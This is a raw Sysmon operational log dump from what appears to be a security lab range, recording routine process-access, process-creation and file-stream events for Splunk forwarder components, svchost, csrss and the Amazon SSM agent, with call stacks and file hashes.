11:11:47.009{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220508Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.009{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220507Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.009{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220506Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.009{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220505Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.009{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220504Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.009{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1673-6216-EE04-000000003902}1908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220503Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.009{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1673-6216-EE04-000000003902}1908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220502Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.010{4F8D34B0-1673-6216-EE04-000000003902}1908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220532Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:48.665{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C62DADF5F1720D54CD6D46EAABC6840,SHA256=42953830E71C6088079B716E2A967B69E828DFC67E609198BBB3BD4E23077EDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:48.730{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F61E58E4B3CF21D8866597EC2F9F8C3E,SHA256=E1C2A49F56BC365D239EE1B0595242FAE27C384EF63F6B08211C2AA23769FC7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:48.728{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-155MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220531Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:48.243{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=801785D8B4D52AA5B37E9E86CC7EE020,SHA256=7B6610B6C61926F484732FC599BA9830E27BECCB72E5A66A8C554ACDB597B4CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:48.179{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A71369402D38E834FA7879C0D97FE91,SHA256=1EFEFD7ACDC53A45A75FC508BA39211B7B33B5E411824916354BCB30B58FD147,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:49.745{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA7789C1514A23F9F53A3765119C200E,SHA256=19AFFDCC6AE5CB7058E8541C283A6172D1C504770E1D47790EB49A1BE7B2F19C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220560Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1675-6216-F104-000000003902}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220559Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220558Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220557Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220556Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220555Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220554Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220553Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220552Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220551Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220550Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1675-6216-F104-000000003902}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220549Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.946{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1675-6216-F104-000000003902}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220548Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.947{4F8D34B0-1675-6216-F104-000000003902}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220547Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.665{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43257B2EC77779D0BDC1C373599E4A2E,SHA256=27A6679BC9BE613FE0AE1A780C144E0820F3AE333A62DE7D122D70594F119266,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220546Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.493{4F8D34B0-1675-6216-F004-000000003902}20682484C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220545Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.274{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1675-6216-F004-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220544Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 